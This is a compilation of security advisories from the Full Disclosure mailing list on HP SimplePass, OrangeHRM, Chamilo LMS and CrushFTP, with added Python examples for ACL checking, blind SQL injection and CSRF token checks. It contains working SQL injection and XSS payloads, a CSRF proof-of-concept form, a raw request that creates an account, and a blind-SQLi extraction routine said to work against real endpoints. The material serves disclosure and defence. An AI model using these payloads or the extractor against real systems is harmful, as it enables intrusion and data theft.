[FD] HP SimplePass Local Privilege Escalation

2017-05-22 Thread Rehan Ahmed

# Vulnerability Title: HP SimplePass Local Privilege Escalation
# Advisory Release Date: 05/18/2017
# Credit: Discovered By Rehan Ahmed
# Contact: knight_re...@hotmail.com
# Severity Level: Medium
# Type: Local
# Tested Platform: Windows 8 & 10 x64
# Vendor: HP Inc.
# Vendor Site: http://www.hp.com
# Download Link: http://ftp.hp.com/pub/softpaq/sp64001-64500/sp64339.exe
# Vulnerable Version: HP SimplePass 8.00.49, 8.00.57, 8.01.46
# Vendor Contacted: 04/03/2017
# Vendor Response: 05/18/2017


Summary:

HP SimplePass allows you to safely store logon information for your favorite 
websites, and use a single method of authentication for your password-protected 
website accounts. Choose a fingerprint, password or PIN to authenticate your 
identity. Your computer must have at least one password-protected Windows User 
Account to use HP SimplePass.

https://support.hp.com/us-en/document/c03653209

#
Issue Details:
#

HP SimplePass is prone to a local privilege-escalation vulnerability due to 
insecure file system permissions granted during installation. A local 
adversary can exploit this issue to gain elevated privileges on the affected 
system.

HP SimplePass installs by default to "C:\Program 
Files\Hewlett-Packard\SimplePass" with very weak folder permissions, granting 
any user full control over the contents of the directory and its subfolders. 
This gives ample opportunity for code execution in the context of any other 
user running the application. HP SimplePass has a few binaries that are 
typically configured as a service or startup program, which makes this 
particularly easy to leverage.
 
##
 
Proof of Concept
##
a) C:\>icacls "C:\Program Files\Hewlett-Packard\SimplePass"

C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)
                                            Everyone:(OI)(CI)(IO)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\SYSTEM:(I)(F)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\Authenticated Users:(I)(M)
                                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)


b) C:\>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i "HP SimplePass"

HP SimplePass Cachedrv Service   Cachedrv server   "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe"   Auto
HP SimplePass Service            omniserv          C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe      Auto

A user can place a malicious DLL/EXE (e.g. a replacement OmniServ.exe) with one 
of the expected names in that directory and wait until the service is restarted. 
Normal users cannot restart the service themselves, but an attacker can simply 
reboot the system or wait for the next reboot to happen.
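As an added example (it is not part of the advisory or of HP's software), the following Python parser reads `icacls` output in the form printed above and reports every ACE that hands a low-privileged principal a write-capable right, distinguishing the entry that applies to the directory itself from the inherit-only `(IO)` entry that governs the binaries inside it. The two ACL listings embedded in it are constructed sample input: the first reproduces the advisory's output, the second is a hardened variant in which non-administrators hold Read/Execute only. The principal and right sets are the author's assumptions about what "an unprivileged user can write here" means; the `(GR,GE)` entry for BUILTIN\Users is deliberately not flagged.

```python
"""Flag a service binary directory whose ACL lets a low-privileged user replace files.

Added example, not part of the advisory: it parses text in the format that
`icacls <dir>` prints and reports ACEs that give Everyone / Users /
Authenticated Users a right sufficient to create or overwrite files.
"""
import re

# Principals every local interactive user belongs to (assumption for this check).
LOW_PRIV_PRINCIPALS = {
    "Everyone",
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}
# icacls rights that allow planting or replacing a file: full, modify, write,
# generic all/write, write data, append data, delete child, and write-DAC /
# write-owner (either of which can be turned into full control).
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "DC", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# "<principal>:(flag)(flag)..." ; icacls prints the path in front of the first ACE.
_ACE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([A-Z,]*\))+)\s*$")


def parse_icacls(output, path):
    """Return [(principal, inherit_flags, rights)] for each ACE in `output`."""
    aces = []
    for raw in output.splitlines():
        m = _ACE.match(raw.strip())
        if not m:            # blank lines and the "Successfully processed" trailer
            continue
        principal = m.group("principal")
        if principal.startswith(path):   # strip the path prefix of the first line
            principal = principal[len(path):].strip()
        flags = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
            flags.update(t for t in group.split(",") if t)   # "(GR,GE)" -> GR, GE
        aces.append((principal, flags & INHERIT_FLAGS, flags - INHERIT_FLAGS))
    return aces


def weak_aces(aces):
    """ACEs that grant a low-privileged principal a write-capable right."""
    findings = []
    for principal, inherit, rights in aces:
        if principal not in LOW_PRIV_PRINCIPALS:
            continue
        granted = sorted(rights & WRITE_RIGHTS)
        if not granted:
            continue
        if "IO" in inherit:
            scope = "files and subfolders below it (inherit-only)"
        elif inherit & {"OI", "CI"}:
            scope = "the directory and everything below it"
        else:
            scope = "the directory itself"
        findings.append({"principal": principal, "rights": granted, "scope": scope})
    return findings


def is_hijackable(output, path):
    """True if an unprivileged user can drop or replace a file under `path`."""
    return bool(weak_aces(parse_icacls(output, path)))


SIMPLEPASS_PATH = r"C:\Program Files\Hewlett-Packard\SimplePass"

# Constructed sample input reproducing the advisory's icacls output.
SIMPLEPASS_ACL = r"""C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)
                                            Everyone:(OI)(CI)(IO)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\SYSTEM:(I)(F)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\Authenticated Users:(I)(M)
                                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed hardened variant: non-administrators get Read/Execute only.
HARDENED_ACL = r"""C:\Program Files\Hewlett-Packard\SimplePass NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(F)
                                            BUILTIN\Users:(I)(OI)(CI)(RX)
"""

if __name__ == "__main__":
    for label, acl in (("as shipped", SIMPLEPASS_ACL), ("hardened", HARDENED_ACL)):
        print(label, "hijackable:", is_hijackable(acl, SIMPLEPASS_PATH))
        for f in weak_aces(parse_icacls(acl, SIMPLEPASS_PATH)):
            print("   %s has %s on %s" % (f["principal"], ",".join(f["rights"]), f["scope"]))
```

On a live host the same parser can be fed the `icacls` output for the directory of every auto-start service path listed by the `wmic` command above; the inherit-only `Everyone:(OI)(CI)(IO)(F)` entry is the one that matters for replacing `OmniServ.exe` itself, while the plain `Everyone:(F)` entry is what allows dropping a new file next to it.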

###
3) Mitigation:
###
 

Change the directory permissions so that every group other than Administrators 
is limited to Read/Execute (the Everyone:(F) entries shown above are what make 
the directory writable by any user).
Fix: 
https://support.hp.com/us-en/drivers/selfservice/hp-envy-m7-n100-notebook-pc/8499292/model/8788306



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] OrangeHRM Blind SQL Injection & XSS Vulnerabilities

2015-04-11 Thread Rehan Ahmed
I. Overview 
 
OrangeHRM (Opensource 3.2.1, Professional & Enterprise 4.11) is prone to 
multiple Blind SQL injection & XSS vulnerabilities. These vulnerabilities 
allow an attacker to inject SQL commands to compromise the database management 
system behind the HRM application, perform operations on behalf of the affected 
victim, redirect them to malicious sites, steal their credentials, and more. 

II. Severity 
 
Rating: High 
Remote: Yes 
Authentication Required: Yes 
CVE-ID: 

III. Vendor's Description of Application 
 

OrangeHRM Solutions

Effective HR tools and options to suit your needs Start-up, SME, global 
enterprises, whichever one you may be, OrangeHRM offers you flexibility and 
freedom to select from free and paid versions of OrangeHRM backed with 
specialized expertise. Our HR modules cover many major human capital management 
extents. OrangeHRM is used by millions of users around the world in all 
industries. Explore our solutions and contact our consultants to assist you 
with your selection process.

http://www.orangehrm.com/


IV. Vulnerability Details & Exploit 
 
1) Blind SQL Injection 


Request Method = GET

a) 
/symfony/web/index.php/leave/getFilteredEmployeeCountAjax?location=-1)+or+(31337=31337)+and+(20=20&subunit=0

Request Method = POST

b) /symfony/web/index.php/recruitment/viewCandidates
   sortField=[BSQLi]
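To make the blind condition above concrete, here is an added example in Python; it is not OrangeHRM's code. `count_vulnerable` is a hypothetical handler that pastes `location` and `subunit` into its WHERE clause in the shape the advisory's payload implies (the closing parenthesis the payload leaves open is supplied by the query text), `count_safe` is the same query with bound parameters, and `is_injectable`/`extract` show how the true/false difference in the returned count is enough to detect the flaw with the advisory's own payload and then read a value out of another table one character at a time. The schema, the table names and the `hunter2` secret are constructed sample data, and the character search assumes ASCII output.

```python
"""Boolean-based blind SQL injection, demonstrated on a constructed stand-in.

Added example, not OrangeHRM code. The vulnerable handler builds its WHERE
clause by string formatting; the safe one binds parameters. The oracle reads
a secret from another table using only the count the endpoint returns.
"""
import sqlite3


def make_db():
    """Constructed sample schema: an employee table and a table holding a secret."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE employee(id INTEGER PRIMARY KEY, location INTEGER, subunit INTEGER);
        CREATE TABLE app_user(name TEXT, secret TEXT);
        INSERT INTO employee VALUES (1, 1, 0), (2, 1, 0), (3, 2, 0);
        INSERT INTO app_user VALUES ('admin', 'hunter2');
        """
    )
    return db


def count_vulnerable(db, location, subunit):
    """Hypothetical vulnerable handler: request parameters pasted into SQL."""
    sql = "SELECT COUNT(*) FROM employee WHERE (location = %s) AND (subunit = %s)" % (
        location, subunit)
    return db.execute(sql).fetchone()[0]


def count_safe(db, location, subunit):
    """Same query with bound parameters; the input can only ever be a value."""
    sql = "SELECT COUNT(*) FROM employee WHERE (location = ?) AND (subunit = ?)"
    return db.execute(sql, (location, subunit)).fetchone()[0]


def is_injectable(handler):
    """Send the advisory's always-true payload and an always-false twin.

    A handler that evaluates the injected expression answers differently to
    the two; a parameterised one treats both as a literal and answers 0 twice.
    """
    always_true = handler("-1) or (31337=31337) and (20=20", "0")
    always_false = handler("-1) or (31337=31338) and (20=20", "0")
    return always_true != always_false


def oracle(handler, condition):
    """True iff `condition` holds server-side: location=1 matches rows, and
    AND-ing a false condition onto it drives the count to zero."""
    return handler("1) AND (%s" % condition, "0") > 0


def _search(handler, make_condition, hi):
    """Binary search in [0, hi] for the value v with not(value > v) and value > v-1."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(handler, make_condition(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(handler, scalar_sql, max_len=64):
    """Recover the result of `scalar_sql` (a SELECT returning one string)."""
    length = _search(handler, lambda v: "length((%s)) > %d" % (scalar_sql, v), max_len)
    chars = []
    for pos in range(1, length + 1):
        code = _search(
            handler,
            lambda v, p=pos: "unicode(substr((%s),%d,1)) > %d" % (scalar_sql, p, v),
            127,  # ASCII assumed; widen the bound for other code points
        )
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    vulnerable = lambda loc, sub: count_vulnerable(db, loc, sub)
    safe = lambda loc, sub: count_safe(db, loc, sub)
    print("vulnerable handler injectable:", is_injectable(vulnerable))
    print("recovered secret:", extract(vulnerable, "SELECT secret FROM app_user WHERE name='admin'"))
    print("safe handler injectable:", is_injectable(safe))
```

Against a real endpoint the handler argument would be an HTTP client that returns the count from the JSON response; the oracle and search logic are unchanged. The parameterised handler answers the true and false probes identically (both are compared to the column as one opaque value), which is exactly why the detection stops firing.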

__ 

2) Multiple Reflected XSS 

Request Method = GET 

a) /symfony/web/index.php/admin/saveJobTitle?jobTitleId=1';+confirm(0);+// 

Request Method = POST

b) /symfony/web/index.php/performance/saveReview  
  saveReview360Form[reviewId] = [XSS Payload]  
  saveReview = [XSS Payload] 


VI. Affected Systems 
 
Software: OrangeHRM 
Version:  OrangeHRM Opensource 3.2.1 or prior
          OrangeHRM Professional & Enterprise 4.11 or prior
Solution (Fix): No

VII. Vendor Response/Solution 
 
Vendor Contacted : 02/12/2015 
Vendor Response : 02/12/2015 
Shared Technical Details/Poc : 02/13/2015
Again Vendor Contacted : 03/04/2015
Vendor Response: No Response
Advisory Release : 04/10/2015

VIII.Credits 
 
Discovered by Rehan Ahmed 
knight_re...@hotmail.com  



[FD] Chamilo LMS 1.9.10 Multiple XSS & CSRF Vulnerabilities

2015-03-18 Thread Rehan Ahmed
<html>
<body>
<form action="/admin/session_add.php" method="POST">
<input type="hidden" name="formSent" value="1" />
<input type="hidden" name="name" value="Test&lt;script&gt;confirm&#40;0&#41;&lt;&#47;script&gt;" />
<input type="hidden" name="coach&#95;username" value="admin" />
<input type="hidden" name="session&#95;category" value="0" />
<input type="hidden" name="nb&#95;days&#95;acess&#95;before" value="0" />
<input type="hidden" name="nb&#95;days&#95;acess&#95;after" value="0" />
<input type="hidden" name="start&#95;limit" value="on" />
<input type="hidden" name="day&#95;start" value="2" />
<input type="hidden" name="month&#95;start" value="3" />
<input type="hidden" name="year&#95;start" value="2015" />
<input type="hidden" name="end&#95;limit" value="on" />
<input type="hidden" name="day&#95;end" value="2" />
<input type="hidden" name="month&#95;end" value="3" />
<input type="hidden" name="year&#95;end" value="2016" />
<input type="hidden" name="session&#95;visibility" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


VI. Affected Systems 
 
Software: Chamilo LMS 
Version: 1.9.10 and Prior
Solution (Fix): Upgrade to 1.9.11 (https://github.com/chamilo/chamilo-lms/)

VII. Vendor Response/Solution 
 
Vendor Contacted : 02/12/2015 
Vendor Response : 02/12/2015 
Patch Release: 03/17/2015 
Advisory Release: 03/18/2015

VIII.Credits 
 
Discovered by Rehan Ahmed 
knight_re...@hotmail.com  



[FD] Crushftp 7.2.0 - Multiple CSRF & XSS Vulnerabilities

2015-02-18 Thread Rehan Ahmed

 I. Overview
 
 Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been 
 identified in Crushftp 7.2.0 (Web Interface) in the default configuration. 
 These vulnerabilities allow an attacker to gain control over valid user 
 accounts, perform operations on their behalf, redirect them to malicious 
 sites, steal their credentials, and more.
 
 II. Severity
 
 Rating: Medium
 Remote: Yes
 Authentication Required: Yes
 
 III. Vendor's Description of Application
 
CrushFTP is a robust file transfer server that makes it easy to setup secure 
connections with your users.

'Crush' comes from the built-in zip methods in CrushFTP. They allow for 
downloading files in compressed formats in-stream, or even automatically 
expanding zip files as they are received in-stream. This is called 
ZipStreaming and can greatly accelerate the transfer of many types of files.

Secure management is web based allowing you the ability to manage and monitor 
the server from anywhere, or with almost any device. Easy in place server 
upgrades without complicated installers. Runs as a daemon, or Windows service 
with no need for a local GUI.

CrushFTP is watching out for you by detecting common hack attempts and robots 
which scan for weak passwords. It will automatically protect you against DDoS 
attacks. No need for you to do anything as CrushFTP will automatically ban 
these IPs to prevent wasted logging and CPU usage. This keeps your server 
secure from unwanted abuse.

User management includes inheritance, groups, and virtual file systems. If you 
want simple user management, it can be as easy as just making a folder with a 
specific name and nothing else. Think about how easily you can delegate user 
administration with CrushFTP's role based administration and event 
configuration.

http://www.crushftp.com/index.html

 
 IV. Vulnerability Details & Exploit
 

 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) 

 a) An attacker may add/delete/modify user's accounts 
 b) May change all configuration settings 

Request Method: POST
Location: /WebInterface/function/

Proof of Concept:- 
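Both the Chamilo proof of concept above and the CrushFTP CSRF case here come down to the same thing: a state-changing POST handler that accepts any request carrying the victim's session cookie. The following added example (Python, not Chamilo's or CrushFTP's code) shows the synchronizer-token check that closes it. A hypothetical `handle_checked` handler demands a per-session secret in a hidden field that a page on another origin cannot read, so a forged auto-submitting form in the shape of the Chamilo PoC (constructed below, with plain field names) is refused, while the application's own form still works; `handle_unchecked` is the behaviour the advisories describe. Session, form and handler names are the author's assumptions.

```python
"""Synchronizer-token CSRF check, exercised against a cross-site auto-submitting form.

Added example, not Chamilo or CrushFTP code: a hypothetical handler that
rejects any POST whose hidden csrf_token does not match the session's token.
"""
import hmac
import secrets
from html.parser import HTMLParser


class Session:
    """The victim's logged-in session: a cookie-bound token issued at login."""
    def __init__(self):
        self.csrf_token = secrets.token_urlsafe(32)
        self.created = []


def render_form(session):
    """The application's own page embeds the token; a page on another origin
    cannot read it, so it cannot reproduce this field."""
    return (
        '<form action="/admin/session_add.php" method="POST">'
        '<input type="hidden" name="csrf_token" value="%s" />'
        '<input type="text" name="name" value="" />'
        '</form>' % session.csrf_token
    )


def handle_unchecked(session, form):
    """What the advisories describe: a valid cookie is all that is required."""
    session.created.append(form["name"])
    return 200


def handle_checked(session, form):
    """Same action, but the hidden field must equal the session's token."""
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session.csrf_token):
        return 403
    session.created.append(form["name"])
    return 200


class _Fields(HTMLParser):
    """Collect <input name=... value=...> pairs, as the browser would submit them."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attrs = dict(attrs)
        if attrs.get("name") and attrs.get("type") != "submit":
            self.fields[attrs["name"]] = attrs.get("value", "")


def fields_from_html(html):
    """What a browser posts when it auto-submits the form in `html`."""
    parser = _Fields()
    parser.feed(html)
    return parser.fields


# Constructed attacker page in the shape of the Chamilo PoC: the browser
# attaches the victim's cookie to this POST, but the page cannot know the token.
ATTACKER_PAGE = """<html><body>
<form action="/admin/session_add.php" method="POST">
<input type="hidden" name="formSent" value="1" />
<input type="hidden" name="name" value="Test&lt;script&gt;confirm&#40;0&#41;&lt;&#47;script&gt;" />
<input type="hidden" name="coach_username" value="admin" />
<input type="hidden" name="session_visibility" value="1" />
<input type="submit" value="Submit request" />
</form></body></html>"""


def simulate(handler):
    """Return (status for the app's own form, status for the forged form)."""
    session = Session()                       # victim is logged in
    legitimate = fields_from_html(render_form(session))
    legitimate["name"] = "Q3 cohort"
    forged = fields_from_html(ATTACKER_PAGE)  # same cookie, no token
    return handler(session, legitimate), handler(session, forged)


if __name__ == "__main__":
    print("without token check:", simulate(handle_unchecked))
    print("with token check:   ", simulate(handle_checked))
```

The captured CrushFTP request below carries an `X-Requested-With: XMLHttpRequest` header; a plain cross-origin HTML form cannot set custom headers, so requiring that header on `/WebInterface/function/` is a second barrier, but the per-session token is the check that does not depend on how the browser was driven.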

2) Multiple Cross-Site Scripting (Web Interface - Default Config)

Type: Reflected
Request Method: POST 
Location: /WebInterface/function/ 
Parameter: vfs_items
Values:  
vfs_items =  


Proof of Concept:

POST /WebInterface/function/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html
Content-Length: 656
Cookie: X
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E


Type: Reflected
Request Method: GET 
Location: /WebInterface/function/ 
Parameter: path
Values:   
